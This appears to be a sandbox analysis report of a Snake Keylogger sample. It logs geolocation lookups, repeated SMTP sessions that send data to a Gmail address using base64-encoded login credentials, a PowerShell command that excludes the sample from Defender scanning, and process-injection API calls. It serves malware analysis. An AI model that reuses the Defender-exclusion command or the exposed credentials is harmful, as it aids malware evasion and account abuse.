            2024-07-26 09:39:10 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.549719188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:11 UTC707INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:11 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9364
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzRIKNbsHy7byMrrAY1RYvd2EK8%2FQSSPVd2dx1R6LfZIkX1SU%2BSymudBZRMF1C4XmzmskyR%2FOAarJ1ETpCWuQUeW%2BjhAfOcbxChyOKnJhyCcsKXd4o01WGTkP19TqhTKvukEbZhV"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bcc481e17f1-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:11 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.549721188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:12 UTC705INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:12 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9365
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NZ080nqmOzDt0xZhhHOycuUI4bL9hL1OPAvA0jTMk1RS5WndVL5d2DxlGrcyIVIKOQjOFZTYwafp%2BZcWFx7afGtledOtyW23mexYXGzPTdEt01IOfWAuAfSi7vE%2F4DxyaFj13%2F3U"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bd54ac11a24-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:12 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.549723188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:14 UTC701INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:14 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9367
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kFNXKqpSjLLa5U7n7SVNpYeoecQbs9FaPYUFFzxYBuT2xNUBypgPEIYo3bb1FIe3RAx37MEJvx7nlbXXK6hDe72aM5O69iRzaLpxfaRdULEwNtOKEcv7hY44Q%2FNfjlDPgyplmUgD"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bdcec577280-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:14 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            SMTP Packets

            TimestampSource PortDest PortSource IPDest IPCommands
            Jul 26, 2024 11:39:21.493563890 CEST5874973077.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:21 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:21.493731976 CEST49730587192.168.2.577.245.159.7EHLO 347688
            Jul 26, 2024 11:39:21.728148937 CEST5874973077.245.159.7192.168.2.5250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:21.730078936 CEST49730587192.168.2.577.245.159.7AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:21.964288950 CEST5874973077.245.159.7192.168.2.5334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:22.267419100 CEST5874973077.245.159.7192.168.2.5235 Authentication succeeded
            Jul 26, 2024 11:39:22.267713070 CEST49730587192.168.2.577.245.159.7MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:22.501398087 CEST5874973077.245.159.7192.168.2.5250 OK
            Jul 26, 2024 11:39:22.502785921 CEST49730587192.168.2.577.245.159.7RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:22.739942074 CEST5874973077.245.159.7192.168.2.5250 Accepted
            Jul 26, 2024 11:39:22.740250111 CEST49730587192.168.2.577.245.159.7DATA
            Jul 26, 2024 11:39:22.974374056 CEST5874973077.245.159.7192.168.2.5354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:22.975301981 CEST49730587192.168.2.577.245.159.7.
            Jul 26, 2024 11:39:23.389702082 CEST5874973077.245.159.7192.168.2.5250 OK id=1sXHQ2-005kGQ-2B
            Jul 26, 2024 11:39:32.611268044 CEST49730587192.168.2.577.245.159.7QUIT
            Jul 26, 2024 11:39:33.046582937 CEST5874973077.245.159.7192.168.2.5221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:33.713608980 CEST5874973177.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:33 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:33.713798046 CEST49731587192.168.2.577.245.159.7EHLO 347688
            Jul 26, 2024 11:39:33.950326920 CEST5874973177.245.159.7192.168.2.5250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:33.950932980 CEST49731587192.168.2.577.245.159.7AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:34.187680006 CEST5874973177.245.159.7192.168.2.5334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:34.439315081 CEST5874973177.245.159.7192.168.2.5235 Authentication succeeded
            Jul 26, 2024 11:39:34.439483881 CEST49731587192.168.2.577.245.159.7MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:34.675419092 CEST5874973177.245.159.7192.168.2.5250 OK
            Jul 26, 2024 11:39:34.675558090 CEST49731587192.168.2.577.245.159.7RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:34.915971994 CEST5874973177.245.159.7192.168.2.5250 Accepted
            Jul 26, 2024 11:39:34.916703939 CEST49731587192.168.2.577.245.159.7DATA
            Jul 26, 2024 11:39:35.154544115 CEST5874973177.245.159.7192.168.2.5354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:35.154834032 CEST49731587192.168.2.577.245.159.7.
            Jul 26, 2024 11:39:35.394805908 CEST5874973177.245.159.7192.168.2.5250 OK id=1sXHQE-005kJ9-2k
            Jul 26, 2024 11:39:35.395258904 CEST49731587192.168.2.577.245.159.7QUIT
            Jul 26, 2024 11:39:35.846493006 CEST5874973177.245.159.7192.168.2.5221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:36.504353046 CEST5874973277.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:36 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:36.504496098 CEST49732587192.168.2.577.245.159.7EHLO 347688
            Jul 26, 2024 11:39:36.739263058 CEST5874973277.245.159.7192.168.2.5250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:36.739579916 CEST49732587192.168.2.577.245.159.7AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:36.975043058 CEST5874973277.245.159.7192.168.2.5334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:37.237426043 CEST5874973277.245.159.7192.168.2.5235 Authentication succeeded
            Jul 26, 2024 11:39:37.237565041 CEST49732587192.168.2.577.245.159.7MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:37.474749088 CEST5874973277.245.159.7192.168.2.5250 OK
            Jul 26, 2024 11:39:37.474888086 CEST49732587192.168.2.577.245.159.7RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:37.713821888 CEST5874973277.245.159.7192.168.2.5250 Accepted
            Jul 26, 2024 11:39:37.713948965 CEST49732587192.168.2.577.245.159.7DATA
            Jul 26, 2024 11:39:37.950402021 CEST5874973277.245.159.7192.168.2.5354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:37.950714111 CEST49732587192.168.2.577.245.159.7.
            Jul 26, 2024 11:39:38.367907047 CEST5874973277.245.159.7192.168.2.5250 OK id=1sXHQH-005kKG-26
            Jul 26, 2024 11:39:38.368346930 CEST49732587192.168.2.577.245.159.7QUIT
            Jul 26, 2024 11:39:38.805028915 CEST5874973277.245.159.7192.168.2.5221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:39.490287066 CEST5874973377.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:39 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:39.490523100 CEST49733587192.168.2.577.245.159.7EHLO 347688
            Jul 26, 2024 11:39:39.732033014 CEST5874973377.245.159.7192.168.2.5250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:39.732247114 CEST49733587192.168.2.577.245.159.7AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:39.974550009 CEST5874973377.245.159.7192.168.2.5334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:40.234587908 CEST5874973377.245.159.7192.168.2.5235 Authentication succeeded
            Jul 26, 2024 11:39:40.234877110 CEST49733587192.168.2.577.245.159.7MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:40.485876083 CEST5874973377.245.159.7192.168.2.5250 OK
            Jul 26, 2024 11:39:40.492093086 CEST49733587192.168.2.577.245.159.7RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:40.738343000 CEST5874973377.245.159.7192.168.2.5250 Accepted
            Jul 26, 2024 11:39:40.738498926 CEST49733587192.168.2.577.245.159.7DATA
            Jul 26, 2024 11:39:40.981273890 CEST5874973377.245.159.7192.168.2.5354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:40.982223988 CEST49733587192.168.2.577.245.159.7.
            Jul 26, 2024 11:39:41.426445961 CEST5874973377.245.159.7192.168.2.5250 OK id=1sXHQK-005kKr-2B
            Jul 26, 2024 11:39:41.427006006 CEST49733587192.168.2.577.245.159.7QUIT
            Jul 26, 2024 11:39:41.870563030 CEST5874973377.245.159.7192.168.2.5221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:43.123014927 CEST5874973477.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:42 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:43.123116970 CEST5874973477.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:42 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:43.123375893 CEST49734587192.168.2.577.245.159.7EHLO 347688
            Jul 26, 2024 11:39:43.123497009 CEST5874973477.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:42 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:43.359286070 CEST5874973477.245.159.7192.168.2.5250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:43.359458923 CEST49734587192.168.2.577.245.159.7AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=
            Jul 26, 2024 11:39:43.600292921 CEST5874973477.245.159.7192.168.2.5334 UGFzc3dvcmQ6
            Jul 26, 2024 11:39:43.843796968 CEST5874973477.245.159.7192.168.2.5235 Authentication succeeded
            Jul 26, 2024 11:39:43.844057083 CEST49734587192.168.2.577.245.159.7MAIL FROM:<grafik@erkanlarofis.com.tr>
            Jul 26, 2024 11:39:44.072933912 CEST5874973477.245.159.7192.168.2.5250 OK
            Jul 26, 2024 11:39:44.073223114 CEST49734587192.168.2.577.245.159.7RCPT TO:<m1911bdk@gmail.com>
            Jul 26, 2024 11:39:44.309470892 CEST5874973477.245.159.7192.168.2.5250 Accepted
            Jul 26, 2024 11:39:44.309607029 CEST49734587192.168.2.577.245.159.7DATA
            Jul 26, 2024 11:39:44.540345907 CEST5874973477.245.159.7192.168.2.5354 Enter message, ending with "." on a line by itself
            Jul 26, 2024 11:39:44.540724993 CEST49734587192.168.2.577.245.159.7.
            Jul 26, 2024 11:39:44.775960922 CEST5874973477.245.159.7192.168.2.5250 OK id=1sXHQO-005kM7-0n
            Jul 26, 2024 11:39:44.776501894 CEST49734587192.168.2.577.245.159.7QUIT
            Jul 26, 2024 11:39:45.208156109 CEST5874973477.245.159.7192.168.2.5221 rosha.wlsrv.com closing connection
            Jul 26, 2024 11:39:45.907793999 CEST5874973577.245.159.7192.168.2.5220-rosha.wlsrv.com ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 12:39:45 +0300
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 26, 2024 11:39:45.907948971 CEST49735587192.168.2.577.245.159.7EHLO 347688
            Jul 26, 2024 11:39:46.171327114 CEST5874973577.245.159.7192.168.2.5250-rosha.wlsrv.com Hello 347688 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-AUTH PLAIN LOGIN
            250-STARTTLS
            250 HELP
            Jul 26, 2024 11:39:46.171766996 CEST49735587192.168.2.577.245.159.7AUTH login Z3JhZmlrQGVya2FubGFyb2Zpcy5jb20udHI=

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:05:38:57
            Start date:26/07/2024
            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Imagebase:0x1d0000
            File size:516'096 bytes
            MD5 hash:967175D3AA79388FD8E84CCBF0B998C7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
            Reputation:low
            Has exited:true

            General

            Target ID:3
            Start time:05:38:57
            Start date:26/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Imagebase:0x9f0000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:4
            Start time:05:38:58
            Start date:26/07/2024
            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Imagebase:0x7f0000
            File size:516'096 bytes
            MD5 hash:967175D3AA79388FD8E84CCBF0B998C7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:low
            Has exited:false

            General

            Target ID:5
            Start time:05:38:58
            Start date:26/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:6
            Start time:05:38:59
            Start date:26/07/2024
            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Imagebase:0x7ff6ef0c0000
            File size:496'640 bytes
            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
            Has elevated privileges:true
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:11.1%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:190
              Total number of Limit Nodes:10
              execution_graph 35771 6adde68 35772 6addff3 35771->35772 35773 6adde8e 35771->35773 35773->35772 35775 6adc1cc 35773->35775 35776 6ade0e8 PostMessageW 35775->35776 35777 6ade154 35776->35777 35777->35773 35778 87acd0 35779 87acdf 35778->35779 35782 87adb7 35778->35782 35790 87adc8 35778->35790 35783 87add9 35782->35783 35785 87adfc 35782->35785 35783->35785 35798 87b051 35783->35798 35802 87b060 35783->35802 35784 87adf4 35784->35785 35786 87b000 GetModuleHandleW 35784->35786 35785->35779 35787 87b02d 35786->35787 35787->35779 35791 87add9 35790->35791 35792 87adfc 35790->35792 35791->35792 35796 87b051 LoadLibraryExW 35791->35796 35797 87b060 LoadLibraryExW 35791->35797 35792->35779 35793 87adf4 35793->35792 35794 87b000 GetModuleHandleW 35793->35794 35795 87b02d 35794->35795 35795->35779 35796->35793 35797->35793 35799 87b074 35798->35799 35801 87b099 35799->35801 35806 87a150 35799->35806 35801->35784 35803 87b074 35802->35803 35804 87b099 35803->35804 35805 87a150 LoadLibraryExW 35803->35805 35804->35784 35805->35804 35807 87b240 LoadLibraryExW 35806->35807 35809 87b2b9 35807->35809 35809->35801 35980 2674040 35981 2674082 35980->35981 35983 2674089 35980->35983 35982 26740da CallWindowProcW 35981->35982 35981->35983 35982->35983 35984 87d060 35985 87d0a6 35984->35985 35989 87d638 35985->35989 35992 87d648 35985->35992 35986 87d193 35995 87d29c 35989->35995 35993 87d676 35992->35993 35994 87d29c DuplicateHandle 35992->35994 35993->35986 35994->35993 35996 87d6b0 DuplicateHandle 35995->35996 35997 87d676 35996->35997 35997->35986 35810 6adb270 35815 6adcca8 35810->35815 35831 6adccf8 35810->35831 35847 6adcc98 35810->35847 35811 6adb27f 35816 6adccae 35815->35816 35817 6adccca 35816->35817 35863 6add28a 35816->35863 35868 6add3f2 35816->35868 35873 6add5b3 35816->35873 35878 6add493 35816->35878 35884 6add555 35816->35884 35889 6add0d5 35816->35889 35893 6add3c3 35816->35893 35898 6add480 35816->35898 35903 6add206 35816->35903 35908 6add387 35816->35908 35912 6add327 35816->35912 35920 6add247 35816->35920 35927 6adda05 35816->35927 35817->35811 35832 6adcc9c 35831->35832 35833 6adccca 35832->35833 35834 6add28a 2 API calls 35832->35834 35835 6adda05 2 API calls 35832->35835 35836 6add247 4 API calls 35832->35836 35837 6add327 4 API calls 35832->35837 35838 6add387 2 API calls 35832->35838 35839 6add206 2 API calls 35832->35839 35840 6add480 2 API calls 35832->35840 35841 6add3c3 2 API calls 35832->35841 35842 6add0d5 2 API calls 35832->35842 35843 6add555 2 API calls 35832->35843 35844 6add493 2 API calls 35832->35844 35845 6add5b3 2 API calls 35832->35845 35846 6add3f2 2 API calls 35832->35846 35833->35811 35834->35833 35835->35833 35836->35833 35837->35833 35838->35833 35839->35833 35840->35833 35841->35833 35842->35833 35843->35833 35844->35833 35845->35833 35846->35833 35848 6adcca8 35847->35848 35849 6adccca 35848->35849 35850 6add28a 2 API calls 35848->35850 35851 6adda05 2 API calls 35848->35851 35852 6add247 4 API calls 35848->35852 35853 6add327 4 API calls 35848->35853 35854 6add387 2 API calls 35848->35854 35855 6add206 2 API calls 35848->35855 35856 6add480 2 API calls 35848->35856 35857 6add3c3 2 API calls 35848->35857 35858 6add0d5 2 API calls 35848->35858 35859 6add555 2 API calls 35848->35859 35860 6add493 2 API calls 35848->35860 35861 6add5b3 2 API calls 35848->35861 35862 6add3f2 2 API calls 35848->35862 35849->35811 35850->35849 35851->35849 35852->35849 35853->35849 35854->35849 35855->35849 35856->35849 35857->35849 35858->35849 35859->35849 35860->35849 35861->35849 35862->35849 35865 6add290 35863->35865 35864 6add367 35932 6ada969 35865->35932 35936 6ada970 35865->35936 35869 6add386 35868->35869 35870 6add3a4 35868->35870 35940 6ada7d0 35869->35940 35944 6ada7d8 35869->35944 35870->35817 35874 6add5bd 35873->35874 35875 6add641 35874->35875 35948 6ada728 35874->35948 35952 6ada720 35874->35952 35875->35817 35879 6add654 35878->35879 35880 6add2c6 35878->35880 35879->35817 35880->35878 35881 6add7e9 35880->35881 35956 6adaa5c 35880->35956 35960 6adaa60 35880->35960 35885 6add55e 35884->35885 35887 6ada969 WriteProcessMemory 35885->35887 35888 6ada970 WriteProcessMemory 35885->35888 35886 6add58b 35887->35886 35888->35886 35964 6adabed 